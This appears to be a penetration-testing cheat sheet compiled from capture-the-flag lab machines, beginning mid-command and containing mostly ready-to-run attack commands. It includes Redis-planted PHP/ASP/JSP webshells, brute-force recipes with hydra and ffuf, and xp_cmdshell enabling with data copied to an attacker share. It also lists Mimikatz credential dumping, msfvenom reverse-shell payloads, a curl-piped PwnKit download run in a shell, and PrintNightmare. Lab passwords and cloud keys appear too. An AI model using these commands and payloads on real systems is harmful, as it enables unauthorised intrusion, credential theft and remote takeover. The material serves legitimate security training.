2\u0026gt;/dev/null find / -user root -type f -perm -4000 -ls 2\u0026gt;/dev/null Cloud / AWS # AWS → secret → s3 # aws configure ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ aws configure AWS Access Key ID [****************c7em]: AKIAA042540D4E8C3E8E AWS Secret Access Key [****************3E8E]: Zf5bIMiltmLF2ux1JZyX3Gs3MasRtlwcAolHc7em Default region name [us-east-1]: Default output format [json]: ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ aws --endpoint-url \u0026lt;http://facts.htb:54321\u0026gt; s3 ls 2025-09-11 08:06:52 internal 2025-09-11 08:06:52 randomfacts ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ Redis # https://hackviser.com/tactics/pentesting/services/redis\nmetasploit # use auxiliary/scanner/redis/redis_server Connecting # redis-cli -h target.com Spawning webshell # Method 1: PHP webshell redis-cli -h target.com \u0026gt; flushall \u0026gt; set shell \u0026#39;\u0026lt;?php system($_REQUEST[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; \u0026gt; config set dbfilename shell.php \u0026gt; config set dir /var/www/html \u0026gt; save # Access: http://target.com/shell.php?cmd=whoami # Method 2: ASP.NET webshell \u0026gt; set shell \u0026#39;\u0026lt;%@ Page Language=\u0026#34;C#\u0026#34; %\u0026gt;\u0026lt;%@ Import Namespace=\u0026#34;System.Diagnostics\u0026#34; %\u0026gt;\u0026lt;%Process.Start(Request[\u0026#34;cmd\u0026#34;]);%\u0026gt;\u0026#39; \u0026gt; config set dbfilename shell.aspx \u0026gt; config set dir C:\\\\inetpub\\\\wwwroot \u0026gt; save # Method 3: JSP webshell \u0026gt; set shell \u0026#39;\u0026lt;%Runtime.getRuntime().exec(request.getParameter(\u0026#34;cmd\u0026#34;));%\u0026gt;\u0026#39; \u0026gt; config set dbfilename shell.jsp \u0026gt; config set dir /var/www/html \u0026gt; save Redis RCE # RCE:https://github.com/Ridter/redis-rce https://github.com/gysf666/RedisModules-ExecuteCommand python redis-rce.py -r 192.168.220.176 -L 192.168.45.198 -P 6666 -p 6379 -f exp.so SSH # usually located in the home directory of the user\nhttp://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa Using a key # nano id_rsa paste the key chmod 600 id_rsa ssh -i id_rsa username@target_ip ssh -i root root@127.0.0.1 -o IdentitiesOnly=yes Cracking a key # └─$ ssh2john id_ed25519 id_ed25519:$sshng$6$16$e641fd491743bdd48d8633fcb477d0cc$290$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010e641fd491743bdd48d8633fcb477d0cc0000001800000001000000330000000b7373682d65643235353139000000208016016aec442bd77315593f7e6b505d37fc52deed8f639302ab1985ad979866000000a0c64764ca8c76078c20a7c69b61eb4867f6d9e504f8aed73d6c6f476b7be93963a69947e0ad5e9eb1b7c0b13b1381635437e295c403584e107441db92d98bae664ac3e2eb57a8166147866593d2439f1c7a4f95b63bfca9f6f028f35e7dad040ba9eec3e8831dd9024f30b59db48861f8f1b3e08345d20489ae095b73baef4c1eba4203dd2b1c92c14c034e0478268654d884349fc0fa875de00f5ea7840a5953$24$130 ┌──(kali㉿kali)-[~/Desktop/Boxes/Facts] └─$ ssh2john id_ed25519 \u0026gt; hash.txt ┌──(kali㉿kali)-[~/Desktop/Boxes/Facts] └─$ cat hash.txt id_ed25519:$sshng$6$16$e641fd491743bdd48d8633fcb477d0cc$290$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010e641fd491743bdd48d8633fcb477d0cc0000001800000001000000330000000b7373682d65643235353139000000208016016aec442bd77315593f7e6b505d37fc52deed8f639302ab1985ad979866000000a0c64764ca8c76078c20a7c69b61eb4867f6d9e504f8aed73d6c6f476b7be93963a69947e0ad5e9eb1b7c0b13b1381635437e295c403584e107441db92d98bae664ac3e2eb57a8166147866593d2439f1c7a4f95b63bfca9f6f028f35e7dad040ba9eec3e8831dd9024f30b59db48861f8f1b3e08345d20489ae095b73baef4c1eba4203dd2b1c92c14c034e0478268654d884349fc0fa875de00f5ea7840a5953$24$130 Old SSH Algorithms # ssh -oKexAlgorithms=+diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 -oHostKeyAlgorithms=+ssh-rsa root@beep.htb Nmap # Going through nmap scripts # ls -al /usr/share/nmap/scripts/ | grep ftp- Top UDP # nmap 10.129.18.188 -sU -top-ports=100 --min-rate=20000 Useful Switches # sn → Ping sweep sS → TCP SYN Pn → Disable host discovery p- → All ports sV → Version detection A → OS detect + scripts + traceroute O → OS detection T4 → Faster scan sC → Default scripts Port Knocking # for i in 571 290 911; do nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 \u0026gt;/dev/null done ssh -i ~/keys/id_rsa_nineveh_amrois amrois@10.10.10.43 Filtered Ports # nmap -p- --min-rate 10000 \u0026lt;ip\u0026gt; Web Enumeration # Gobuster # gobuster dir -u \u0026lt;http://10.129.229.27/\u0026gt; -w /home/kali/Desktop/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -k if https also try --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt API enumeration make a file like this {GOBUSTER}/v1 {GOBUSTER}/v2 name it pattern and then kali@kali:~$ gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern and then u can follow gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt Dirb # dirb \u0026lt;http://192.168.1.224/\u0026gt; /usr/share/wordlists/dirb/common.txt Feroxbuster # feroxbuster -u \u0026lt;http://10.10.11.220\u0026gt; -x php feroxbuster -u \u0026lt;http://10.10.11.220/js\u0026gt; -x js feroxbuster -u http://\u0026lt;IP\u0026gt; -w /usr/share/wordlists/dirb/common.txt -x php,txt,html **I’ll use feroxbuster to brute force the API. I’ll use the -m GET,POST option to try both GET and POST requests, and -k to accept the invalid TLS certificate. I’m starting at /nagiosxi/api, and it finds v1 quickly (as well as includes):** Sublist3r # sublist3r -d website -e google,yahoo Wfuzz # wfuzz -u \u0026lt;http://10.129.18.188\u0026gt; -H \u0026#34;Host: FUZZ.pandora.htb\u0026#34; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 1131 wfuzz -u http://\u0026lt;IP\u0026gt; -H \u0026#34;Host: FUZZ.domain.htb\u0026#34; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt Parameter fuzzing wfuzz -u \u0026lt;https://streamio.htb/admin/?FUZZ=\u0026gt; -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H \u0026#34;Cookie: PHPSESSID=jtde06u71uq4t7pvs59b8iis1o\u0026#34; --hh 1678 Php filter # \u0026lt;https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php:\u0026gt; echo \u0026#34;PGgxPDQo/Pg==\u0026#34; | base64 -d \u0026gt; master.php Ffuf # Username Enumeration # ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d \u0026#34;username=FUZZ\u0026amp;email=x\u0026amp;password=x\u0026amp;cpassword=x\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://MACHINE_IP/customers/signup -mr \u0026#34;username already exists\u0026#34; Subdomain Enum # ffuf -u \u0026lt;http://builder.htb/\u0026gt; -H \u0026#34;Host: FUZZ.trackbox.scipiosoft.com\u0026#34; -w /home/kali/Desktop/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac ffuf -u \u0026#34;\u0026lt;http://builder.htb:8080\u0026gt;\u0026#34; -H \u0026#34;Host: FUZZ.builder.htb:8080\u0026#34; -w /home/kali/Desktop/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac Bruteforcing # ffuf -w valid_usernames.txt:W1 -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d \u0026#34;username=W1\u0026amp;password=W2\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://MACHINE_IP/customers/login -fc 200 ffuf -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u \u0026lt;http://10.129.95.192/\u0026gt; -fc 200 ffuf -w users.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d \u0026#34;username=W1\u0026amp;password=W2\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u \u0026lt;http://10.129.1.27/login.php\u0026gt; -fc 200 Dirbusting # ffuf -u \u0026lt;http://editorial.htb/FUZZ\u0026gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.txt,.bak,.old,.zip -fc 404 -k Service Enumeration # SMB # smbclient -L \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\192.91.46.3\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ -U admin to access share remove -L smbclient \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\192.91.46.3\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\public -U admin justuse this **smbclient //10.129.95.154/IT -U intelligence.htb/Tiffany.Molina%NewIntelligenceCorpUser9876 impacket-smbclient Tiffany.Molina:NewIntelligenceCorpUser9876@10.129.95.154** crackmapexec smb support.htb --shares -M spider_plus -o DOWNLOAD_FLAG=True netexec smb $target -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --shares --spider HR --regex grep -ri \u0026#39;user\u0026#39; /root/.nxc/... or pass gpp=decrypt nmblookup -A [ip] smbmap -H [ip/hostname] nmap --script smb-enum-shares -p 139,445 [ip] smbclient -N \u0026#34;//$target/Replication\u0026#34; CrackMapExec # crackmapexec smb support.htb crackmapexec smb support.htb -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; crackmapexec winrm 10.129.6.151 -u support -p \u0026#39;Ironside47pleasure40Watchful\u0026#39; --\u0026gt; checks if winrm is allowed OpenSSL # openssl s_client -connect sequel.htb:3269 OpenSSL - Extracting the loot # oxdf@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt ls legacyy_dev_auth.* $ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt MSSQL # python mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@target -windows-auth or without windows auth EXEC xp_dirtree \u0026#39;\\\\\\\\\\\\\\\\10.10.14.137\\\\\\\\share\u0026#39;,1,1 activating xpcmdshell EXECUTE sp_configure \u0026#39;show advanced options\u0026#39;, 1 RECONFIGURE EXECUTE sp_configure \u0026#39;xp_cmdshell\u0026#39;, 1 RECONFIGURE xp_cmdshell whoami transferring file sudo impacket-smbserver share . -smb2support enable_xp_cmdshell xp_cmdshell \u0026#34;copy C:\\\\\\\\inetpub\\\\\\\\wwwroot\\\\\\\\website-backup-27-07-23-old.zip \\\\\\\\\\\\\\\\\u0026lt;YOUR_KALI_IP\u0026gt;\\\\\\\\share\\\\\\\\backup.zip\u0026#34; or xp_cmdshell \u0026#34;cd C:\\\\\\\\inetpub\\\\\\\\wwwroot \u0026amp;\u0026amp; powershell -c python -m http.server 8000\u0026#34; Switching Users\nSELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = \u0026#39;IMPERSONATE\u0026#39; name -------------- hrappdb-reader SQL (HAERO\\discovery guest@master)\u0026gt; EXECUTE AS LOGIN = \u0026#39;hrappdb-reader\u0026#39; SQL (hrappdb-reader guest@master)\u0026gt; use hrappdb [*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb [*] INFO(DC\\SQLEXPRESS): Line 1: Changed database context to \u0026#39;hrappdb\u0026#39;. SQL (hrappdb-reader hrappdb-reader@hrappdb)\u0026gt; SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES; TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ------------- ------------ ---------- ---------- hrappdb dbo sysauth b\u0026#39;BASE TABLE\u0026#39; Postgres # psql -h 192.168.143.47 -p 5437 -U postgres MYSQL # mysql -h 127.0.0.1 -P 3306 -u tiffany -p\u0026#39;BackDropJ2024DS2024\u0026#39; instead of terminatpr ; use \\G updating password UPDATE planning_user SET password=\u0026#39;df5b909019c9b1659e86e0d6bf8da81d6fa3499e\u0026#39; WHERE user_id=\u0026#39;ADM\u0026#39;; SNMP # snmp-check 10.10.10.10 snmpwalk -v2c -c public 10.129.230.96 -m all One thing to always check out is the running processes and their command lines. Process 1312 in my collection (will be different in others) is a sudo process:f snmpbulkwalk -v2c -c public ipaddr -m all | tee snmp.out grep SWRun snmp.out } grep 1222 SMTP # Verifying usernames\nsmtp-user-enum -M VRFY -U users.txt -t 192.169.139.140 RPC-client # rpcclient -U \u0026#34;\u0026#34; -N 10.10.10.172 querydispinfo GitDump # python3 -m venv venv source venv/bin/activate pip install PySocks,urllib3,dulwich,requests,bs4,requests-pkcs12 python git_dumper.py \u0026lt;http://siteisup.htb/dev/.git/\u0026gt; dumped_git git log git status git diff --cached Dockerfile.ghost grep -R \u0026#34;@dog.htb\u0026#34; * Inspect specific commits/files: git checkout \u0026lt;commit-id\u0026gt;: Switches your working directory to a specific commit ID to examine the state of files at that point in time. git show \u0026lt;commit-id\u0026gt;: Displays the changes introduced by a specific commit, including file contents and metadata. git diff \u0026lt;commit-id-1\u0026gt; \u0026lt;commit-id-2\u0026gt;: Shows the differences between two specific commits. Look for sensitive information within files: grep -r \u0026#34;password\u0026#34; .: Use grep to search the repository files for keywords like \u0026#34;password\u0026#34;, \u0026#34;API_key\u0026#34;, \u0026#34;credentials\u0026#34;, etc. LDAP \u0026amp; ldapdomaindump # ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; ldapsearch -H ldap://nagios.monitored.htb -x -s base namingcontexts ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; \u0026#34;(objectClass=user)\u0026#34; ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; \u0026#34;(objectClass=person)\u0026#34; nxc ldap 10.129.95.154 \\\\\\\\ -u Tiffany.Molina \\\\\\\\ -p \u0026#39;NewIntelligenceCorpUser9876\u0026#39; \\\\\\\\ --query \u0026#34;(objectClass=dnsNode)\u0026#34; \u0026#34;CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; ldapsearch -x -H ldap://10.129.95.154 \\\\\\\\ -D \u0026#34;Tiffany.Molina@intelligence.htb\u0026#34; \\\\\\\\ -w \u0026#39;NewIntelligenceCorpUser9876\u0026#39; \\\\\\\\ -b \u0026#34;CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; ldapdomaindump -u management.htb\\\\\\\\\\\\\\\\operator -p \u0026#39;operator\u0026#39; 10.10.11.236 -o ldap/ check domain_users_by_group.html http-proxy enumeration # #To scan itself on port 443 curl -i --proxy \u0026lt;http://192.168.113.189:3128\u0026gt; \u0026lt;http://192.168.113.189:443\u0026gt;#To scan itself on port 8000 curl -i --proxy \u0026lt;http://192.168.113.189:3128\u0026gt; \u0026lt;http://192.168.113.189:8000\u0026gt; 80 - HTTP (default) 443 - HTTPS (default secure) 8080 - Common alternative HTTP port (you found this!) 8000 - Alternative web server 8888 - Alternative web server 3000 - Node.js/React development servers 5000 - Flask/Python development servers 8443 - Alternative HTTPSAdmin/Management Interfaces:9090 - Cockpit, other admin panels 10000 - Webmin 8181 - GlassFish adminWindows Specific:5985 - WinRM HTTP 5986 - WinRM HTTPS gobuster dir -u http://192.168.139.189:8080 -w /usr/share/wordlists/dirb/common.txt --proxy http://192.168.139.189:3128 2. Credential Attacks # NXC # nxc ssh 10.10.11.58 -u users.txt -p \u0026#39;BackDrop\u0026#39; WPSCAN # wpsacn --url \u0026lt;http://internal.thm/wordpress\u0026gt; -U userlist.txt --passwords /usr/share/wordlists/rockyou.txt wordpress rev shell 404 TwentySeveneteen Theme editor Burp # After sending to intruder, add your payload positions Choose Cluserbomb attack load rockyou Hydra # SSH # hydra -L users.txt -P passwords.txt 192.168.122.122 ssh -t4 -vV hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb ssh hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://servmon.htb -t 4 -vV PHPMyAdmin Example # hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form \u0026#34;/db/index.php:password=^PASS^\u0026amp;remember=yes\u0026amp;login=Log+In\u0026amp;proc_login=true:Incorrect password\u0026#34; Rails Example # hydra -l admin -P passwords.txt facts.htb http-post-form \u0026#34;/admin/login:authenticity_token=TOKEN\u0026amp;user[username]=^USER^\u0026amp;user[password]=^PASS^:F=Invalid\u0026#34; Redirect Example # hydra -l admin -P rockyou.txt facts.htb http-post-form \u0026#34;/admin/login:authenticity_token=TOKEN\u0026amp;user[username]=^USER^\u0026amp;user[password]=^PASS^:S=/admin\u0026#34; FTP # hydra -L users.txt -P passwords.txt 192.x.x.x ftp wget -r ftp://Anonymous:pass@$IP cat * Normal Login Form # hydra -l info -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:F=error\u0026#34; \u0026#34;path:POSTDATA:FAILURE_STRING\u0026#34; --\u0026gt; format hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 http-post-form \u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:F=Location\\\\\\\\: /loginError\u0026#34; **body failure string** hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 \\\\\\\\ http-post-form \u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:F=Username or Password incorrect\u0026#34; if success cond hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 \\\\\\\\ http-post-form \u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:S=Location\\\\\\\\: /\u0026#34; just match the substring in the response body form as the above dont work due to parsing the : hydra -l jennifer -P /usr/share/wordlists/rockyou.txt builder.htb -s 8080 http-post-form \u0026#34;/j_spring_security_check:j_username=^USER^\u0026amp;j_password=^PASS^\u0026amp;from=\u0026amp;Submit=:F=loginError\u0026#34; hydra -l dogBackDropSystem -P /usr/share/wordlists/rockyou.txt doghtb -s 80 http-post-form \u0026#34;/?q=user/login:name=^USER^\u0026amp;pass=^PASS^\u0026amp;form_build_id=form-qK3HdRXEJYejDODP5Q3MlHmOGr9o8x3B0ScS0suDm68\u0026amp;form_id=user_login\u0026amp;op=Log+in:F=Sorry, incorrect password\u0026#34;\u0026#34; hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p BackDropJ2024DS2024 dog.htb \\\\\\\\ http-post-form \u0026#34;/?q=user/login:name=^USER^\u0026amp;pass=^PASS^\u0026amp;form_build_id=form-qK3HdRXEJYejDODP5Q3MlHmOGr9o8x3B0ScS0suDm68\u0026amp;form_id=user_login\u0026amp;op=Log+in:F=Sorry, incorrect password\u0026#34; hydra -l admin@linkvortex.htb -P /usr/share/wordlists/rockyou.txt linkvortex.htb \\\\\\\\ http-post-form \u0026#34;/ghost/api/admin/session:{\\\\\\\\\u0026#34;username\\\\\\\\\u0026#34;:\\\\\\\\\u0026#34;^USER^\\\\\\\\\u0026#34;,\\\\\\\\\u0026#34;password\\\\\\\\\u0026#34;:\\\\\\\\\u0026#34;^PASS^\\\\\\\\\u0026#34;}:F=Invalid\u0026#34; hydra -C userpass streamio.htb https-post-form \u0026#34;/login.php:username=^USER^\u0026amp;password=^PASS^:F=failed\u0026#34; FFUF # ffuf -u \u0026lt;http://linkvortex.htb/ghost/api/admin/session\u0026gt; -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -H \u0026#34;X-Ghost-Version: 5.58\u0026#34; -H \u0026#34;Origin: \u0026lt;http://linkvortex.htb\u0026gt;\u0026#34; -H \u0026#34;Referer: \u0026lt;http://linkvortex.htb/ghost/\u0026gt;\u0026#34; -d \u0026#34;{\u0026#34;username\u0026#34;:\u0026#34;admin@linkvortex.htb\u0026#34;,\u0026#34;password\u0026#34;:FUZZ}\u0026#34; -w /usr/share/wordlists/rockyou.txt -fr \u0026#34;Your password is incorrect\u0026#34; ffuf -u \u0026#34;\u0026lt;http://$target/Account/login.aspx?Return\u0026gt;\u0026#34; -w /usr/share/wordlists/rockyou.txt -d \u0026#39;_VIEWSTATE=adfkajfkpajwfipjapfjawLgoinUSERPassword=FUZZ\u0026#39; -X POST -t 20 -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -r -fs 4466 ffuf -request request.txt -w /path/to/wordlist.txt ffuf -request request.txt -w users.txt:FUZZUSR -w passwords.txt:FUZZPW **Wrogn password stats** curl -s -X POST http://192.168.126.29/login.php \\ -d \u0026#34;user=admin\u0026#34; \\ -d \u0026#34;pass=thiswillneverwork123456789\u0026#34; \\ -d \u0026#34;submit=Login\u0026#34; | wc -c **Then └─$ ffuf -u http://192.168.126.29/login.php \\ -X POST \\ -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; \\ -d \u0026#34;user=admin\u0026amp;pass=FUZZ\u0026amp;submit=Login\u0026#34; \\ -w /usr/share/wordlists/rockyou.txt \\ -fs 276 \\ -t 6 \\ -mc 200,302** Medusa # medusa -h 192.168.126.29 -u admin -P /usr/share/wordlists/rockyou.txt \\ -M http \\ -m FORM:/login.php \\ -m FORM-DATA:\u0026#34;ser=admin\u0026amp;pass=^PASS^\u0026amp;submit=Login\u0026#34; \\ -m DENY-SIGNAL:\u0026#34;Password incorrect.\u0026#34; \\ -T 4 CrackMapExec # crackmapexec winrm -u administrator -p tinkerbell -x \u0026#34;whoami\u0026#34; credspray netexec smb $target -u \u0026#39;userlist2.txt\u0026#39; -p \u0026#39;creds.txt\u0026#39; --continue-on-success John # john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt specify --form=NT when cracking NT hashes Hashcat # hashcat -m 5600 hash.txt rockyou.txt hashcat -m 0 hashes.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt If you dont mention the mode then it goes in autodetect -m 7900 for msql drupal hashes 3. Exploitation # Windows PrivEsc Helpers # Certutil # certutil -urlcache -split -f \u0026#34;\u0026lt;http://example.com/file.exe\u0026gt;\u0026#34; [LocalPath] iwr http://192.168.45.159/winPEASany.exe -outfile winPEASany.exeb PrintSpoofer - Standard Windows 2019 # PrintSpoofer32.exe -i -c cmd.exe or powershell.exe Import-Module .\\\\\\\\\\\\\\\\Invoke-TokenManipulation.ps1 Invoke-TokenManipulation -CreateProcess \u0026#34;cmd.exe\u0026#34; -ImpersonateUser \u0026#34;NT AUTHORITY\\\\\\\\\\\\\\\\SYSTEM\u0026#34; WinExploitSuggester # python3 wes.py -u python3 wes.py sysinfo Mimikatz # Invoke-WebRequest \u0026lt;http://10.10.14.28:8081/mimikatz.exe\u0026gt; -OutFile C:\\\\\\\\\\\\\\\\Users\\\\\\\\\\\\\\\\Public\\\\\\\\\\\\\\\\mimikatz.exe must have SeDebug use Get-LocalUser to check if user availble locally first Get-LocalGroup privilege::debug token::elevate lsadump::sam sekurlsa::logonpasswords PowerUp.ps1 # wget PowerUp.ps1 -o PowerUp.ps1 . .\\\\\\\\PowerUp.ps1; Invoke-AllChecks AlwaysInstallElevated we can create a malicious msi payload and trigger it for an elevated sesion as it allows to run files with a high privileged user account msfvenom =p windows/x64/shell_reverse_tcp LHOST=10.13.31.108 LPORT=443 -f msi -o reverse,msi now lets prep the listener and run the executable msiexec /quiet /qn /i \\\\\\\\\\\\\\\\TSCLIENT\\\\\\\\share\\\\\\\\reverse.msi or msiexec /quiet /qn /i reverse.msi wget -useb 10.0.2.11/reverse.msi -o reverse.msi Invoke-AllChecks Invoke-ServiceAbuse -Name \u0026#39;AbyssWebServer\u0026#39; -UserName \u0026#39;dcorp\\\\\\\\studentx\u0026#39; -Verbose UAC Bypass # if we are part of the administrator group but have mandatory lervel medium Check if autoelevate is linked to this particular executable powershell -C Get-Content -Path C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\fodhelper.exe | findstr /I \u0026#34;autoElevate\u0026#34; or powershell -C Get-Content -Path C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\eventvwr.exe | findstr /I \u0026#34;autoElevate\u0026#34; PrintNightmare # Try this maybe it works sometimes wget -usebasicparsing 10.10.14.58/CVE-2021-1675.ps1 -o CVE-2021-1675.ps1 . .\\\\\\\\CVE-2021-1675.ps1;Invoke-Nightmare net user netexec smb $target -u \u0026#39;admin\u0026#39; -p \u0026#39;Password\u0026#39; --ntds impacket-psexec egostical-bank.local/administrator@target -hashes :8345adawdac Add User to Local Admin # net localgroup \u0026#34;administrators\u0026#34; adiaz /add Payloads / Generators # pwnkit # sh -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)\u0026#34; msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT=1234 -f asp \u0026gt; shell.asp msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe \u0026gt; destpath msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.54 LPORT=8220 -f exe -o revshell.exe SQLMAP # sqlmap -r req.txt --batch --level 3 --risk 2 . List all databases bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; --dbs 2. List tables in a specific database bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; -D \u0026lt;database_name\u0026gt; --tables 3. Dump all data from a specific database bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; -D \u0026lt;database_name\u0026gt; --dump 4. Dump specific table bash Copy sqlmap -u \u0026#34;\u0026lt;http://cctv.htb/view?request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; -D \u0026lt;database_name\u0026gt; -T \u0026lt;table_name\u0026gt; --dumpsqlmap -u \u0026#34;\u0026lt;http://cctv.htb/zm/index.php?view=request\u0026amp;request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026gt;\u0026#34; \\\\\\\\ --cookie=\u0026#34;ZMSESSID=6lkqf49jhdfdo1l4nplp9m9o5\u0026#34; \\\\\\\\ -D zm -T Users -C Username,Password \\\\\\\\ --where=\u0026#34;Username=\u0026#39;mark\u0026#39;\u0026#34; \\\\\\\\ --dump --threads 10 --batch Filter Bypass Techniques # For white spaces we can use brace expansion :- {ping,-c,10.10.10.10}; or env variable, ${IFS} :- ping${IFS}-c${IFS}1 4. Active Directory # PowerView # . .\\Powerview.ps1 Enumeration $env:username$env:computername gets the comp name nd username Domain Enumeration Get-NetComputer ForEach-Object {$ip = Resolve-DNSName $*.name -ErrorAction SilentlyContinue Domain Enumeration Get-DomainUser -Identity (whoami) Current domain user Domain Enumeration Get-DomainUser Displays domain user info Domain User Enumeration Get-DomainUser select -ExpandProperty samaccountname Domain User Enumeration Get-DomainComputer select -ExpandProperty dnshostname Domain User Enumeration Get-DomainGroup -Identity \u0026ldquo;Domain Admins\u0026rdquo; Gets us the Domain Admins Groups details Domain User Enumeration Get-DomainGroupMember -Identity \u0026ldquo;Domain Admins” Gets us the members of the Domain Admin Group Domain User Enumeration Get-DomainGroupMember -Identity \u0026ldquo;Enterprise Admins\u0026rdquo; -Domain moneycorp.local Lists out the Enterprise admins, root domain is specified in the query DNS / GMSA # Adding A DNS Record # dnstool.py -u \u0026#39;intelligence\\\\\\\\Tiffany.Molina\u0026#39; -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web1 -d 10.10.14.137 -t GMSA DUMP # python gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248 BloodHound # BloodHound Setup # sudo apt install -y neo4j sudo apt install -y openjdk-17-jdk sudo apt install -y bloodhound sudo /usr/share/neo4j/bin/neo4j-admin set-initial-password bloodhound Collection with bloodyad # bloodyAD -d secura.yzx -u Eric.Wallows -p \u0026#39;EricLikesRunning800\u0026#39; --host dc01.secura.yzx --dc-ip 192.168.122.97 --dns 192.168.122.97 A good mental model:\nd → AD domain -host → the DC you want to talk to -dc-ip → DC IP if hostname resolution is flaky -dns → DNS server to resolve AD names Collection # nxc ldap 192.168.122.97 -u Eric.Wallows -p \u0026#39;EricLikesRunning800\u0026#39; -d secura.yzx --dns-server 192.168.122.97 --bloodhound --collection All 